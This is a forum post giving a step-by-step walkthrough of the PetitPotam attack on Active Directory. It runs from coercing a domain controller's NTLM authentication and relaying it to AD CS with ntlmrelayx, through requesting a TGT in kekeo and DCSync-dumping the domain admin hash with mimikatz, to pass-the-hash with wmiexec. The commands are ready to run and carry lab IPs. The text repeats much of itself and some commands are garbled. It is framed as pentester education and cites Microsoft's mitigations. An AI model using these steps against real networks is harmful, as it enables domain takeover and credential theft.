Brother
Professional
- Messages
- 2,590
- Reaction score
- 544
- Points
- 113
In this article, I will talk about the PetitPotam attack, which allows, under certain conditions, to take over a domain controller in just a few steps. The attack is based on the fact that you can force a domain controller to authenticate to your host, obtain its hash and relay it to Active Directory Certificate Services for privilege escalation. The article is intended for pentesters and those who want to learn about current attacks on Active Directory.
The EFSRPC protocol is used to maintain and manage encrypted data that is stored remotely and accessed over the network.
With PetitPotam, you can force a domain controller to initiate an authentication process on a server under the attacker's control and share the NTLM hash value with it. Using the received data, an attacker can carry out an NTLM-relay attack.
NTLM-relay at a glance
The essence of the NTLM-relay attack is to interfere with the authentication process using the NTLM protocol and gain access to a third-party resource with the privileges of the attacked user by passing it the NTLM hash of the user or service that is trying to authenticate. The attack can be carried out against any protocol that supports NTLM authentication (SMB, HTTP, LDAP, etc.).
https://en.hackndo.com/ntlm-relay/#authentication-vs-session
By using the PetitPotam attack, an attacker can elevate his privileges to a domain administrator. For a successful attack, it is necessary that:
Thus, the attacker relays the NTLM hash of the domain controller to the Web Enrollment AD CS (Active Directory Certificate Services) and requests a certificate on behalf of the domain controller. This certificate is then used to request a TGT (Ticket Granting Ticket).
TGT at a glance
After successful authentication by the user, the key distribution center issues a primary certificate for access to network resources - Ticket Granting Ticket. If this ticket is signed with a Kerberos domain account (krbtgt), then the ticket will be Golden Ticket, which will allow the user to authenticate on any server in this domain.
Next, we will look at the algorithm of actions for the attack.
To have ntlmrelayx relay the NTLM hash of the domain controller to AD CS, we use the KerberosAuthentication template, but you can also use the DomainControllers template.
If you go to https://192.168.0.123/certsrv/certfnsh.asp , we will see an authentication form.
While ntlmrelayx is waiting for connections, we use PetitPotam NTLM to initiate authentication of the domain controller with the attacking server controlled by the attacker for subsequent relaying of the NTLM hash to AD CS.
This certificate can be used to obtain a TGT in the Kerberos Authentication Service.
We import this certificate into kekeo.
We now have a TGT that we can use to authenticate to any host in the domain. With it, we can get the NTLM hash of any domain user from a domain controller.
Use mimikatz to dump the NTLM hash of the user adm, who is the domain administrator.
Microsoft recommended precautions can be found here: https://support.microsoft.com/en-gb...s-on-active-directory-certificate-services-ad -cs-3612b773- 4043-4aa9-b23d-b87910cd3429
As additional materials, I recommend that you read the articles:
About PetitPotam
The vulnerability was discovered by security researcher Gilles Lionel on July 18, 2021. The PetitPotam attack allows a domain controller to authenticate to any remote server. It does this by using the MS-EFSRPC EfsRpcOpenFileRaw method, which forces the computer account to authenticate to another system.The EFSRPC protocol is used to maintain and manage encrypted data that is stored remotely and accessed over the network.
With PetitPotam, you can force a domain controller to initiate an authentication process on a server under the attacker's control and share the NTLM hash value with it. Using the received data, an attacker can carry out an NTLM-relay attack.
NTLM-relay at a glance
The essence of the NTLM-relay attack is to interfere with the authentication process using the NTLM protocol and gain access to a third-party resource with the privileges of the attacked user by passing it the NTLM hash of the user or service that is trying to authenticate. The attack can be carried out against any protocol that supports NTLM authentication (SMB, HTTP, LDAP, etc.).
https://en.hackndo.com/ntlm-relay/#authentication-vs-session
By using the PetitPotam attack, an attacker can elevate his privileges to a domain administrator. For a successful attack, it is necessary that:
- The attacker had access to the internal network
- The Web Enrollment option has been activated in Active Directory Certificate Services (AD CS)
Thus, the attacker relays the NTLM hash of the domain controller to the Web Enrollment AD CS (Active Directory Certificate Services) and requests a certificate on behalf of the domain controller. This certificate is then used to request a TGT (Ticket Granting Ticket).
TGT at a glance
After successful authentication by the user, the key distribution center issues a primary certificate for access to network resources - Ticket Granting Ticket. If this ticket is signed with a Kerberos domain account (krbtgt), then the ticket will be Golden Ticket, which will allow the user to authenticate on any server in this domain.
Next, we will look at the algorithm of actions for the attack.
Attack scheme
- Run ntlmrelayx to relay domain controller credentials to AD CS
- Run PetitPotam to initiate NTLM authentication of the domain controller with the attacker's controllable server (ntlmrelayx)
- Get the PKCS12 certificate in base64 format
- We import the certificate into kekeo (for a TGT request).
- Run mimikatz to dump SAM secrets for the selected user
- Let's launch a Pass-the-hash attack
- 192.168.0.123 - AD CS (Windows Server 2019)
- 192.168.0.122 - Domain Controller (Windows Server 2019)
- 192.168.0.124 - NTLM-listener (Kali linux)
Step 1. Launch ntlmrelayx
Preparation
Code:
git clone https://github.com/ExAndroidDev/impacket.git
sudo pip3 uninstall impacket
sudo pip uninstall impacket
sudo pip3 install -r requirements.txt
sudo python3 setup.py install
sudo python3 ntlmrelayx.py -debug -smb2support --target http://192.168.0.123/certsrv/certfnsh.asp --adcs --template KerberosAuthenticationTo have ntlmrelayx relay the NTLM hash of the domain controller to AD CS, we use the KerberosAuthentication template, but you can also use the DomainControllers template.
If you go to https://192.168.0.123/certsrv/certfnsh.asp , we will see an authentication form.
Step 2. PetiPotam
Preparation
Code:
python3 Petitpotam.py 192.168.0.124 192.168.0.122While ntlmrelayx is waiting for connections, we use PetitPotam NTLM to initiate authentication of the domain controller with the attacking server controlled by the attacker for subsequent relaying of the NTLM hash to AD CS.
Step 3. PKCS12 certificate
On a machine running ntlmrelayx, we receive a PKCS12 certificate in base64, which is registered in AD CS on behalf of a domain controller.
This certificate can be used to obtain a TGT in the Kerberos Authentication Service.
Step 4. Import PKCS12 to kekeo
Preparation
Code:
curl [https://github.com/gentilkiwi/kekeo/releases/download/2.2.0-20210723/kekeo.zip](https://github.com/gentilkiwi/kekeo/releases/download/2.2.0-20210723/kekeo.zip) -o kekeo.zip
tar -xf .\kekeo.zipWe import this certificate into kekeo.
Code:
. \ kekeo.exe
base64 / input: on
tgt :: ask / pfx: <base64 certificate from step 3> / user: <specify user from step 3> / domain: <domain name> / ptt
Step 5. Mimikatz
Preparation
Code:
curl [https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip ](https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724 /mimikatz_trunk.zip) -o mimikatz.zip
tar -xf mimikatz.zip
. \ mimikatz.exe
lsadump :: dcsync / domain: <domain name> / user: <specify any user>We now have a TGT that we can use to authenticate to any host in the domain. With it, we can get the NTLM hash of any domain user from a domain controller.
Use mimikatz to dump the NTLM hash of the user adm, who is the domain administrator.
Code:
mimikatz # lsadump :: dsync /domain:DEITERIY.LAB / user: adm
Step 6. Pass-the-hash
Using Pass-the-hash, we authenticate on any host, for example, on a domain controller.
Code:
wmiexec.exe -hashes: ntlm DEITERIY/adm@192.168.0.122
Conclusion
In this way, in a few steps, you can elevate your privileges to a domain administrator. It is worth noting that attacks based on NTLM-relay have been around for a long time, but the PetitPotam attack stands out from them, since it does not require credentials and does not require user interaction to initiate authentication by the domain controller on the attacker's server.Microsoft recommended precautions can be found here: https://support.microsoft.com/en-gb...s-on-active-directory-certificate-services-ad -cs-3612b773- 4043-4aa9-b23d-b87910cd3429
As additional materials, I recommend that you read the articles:
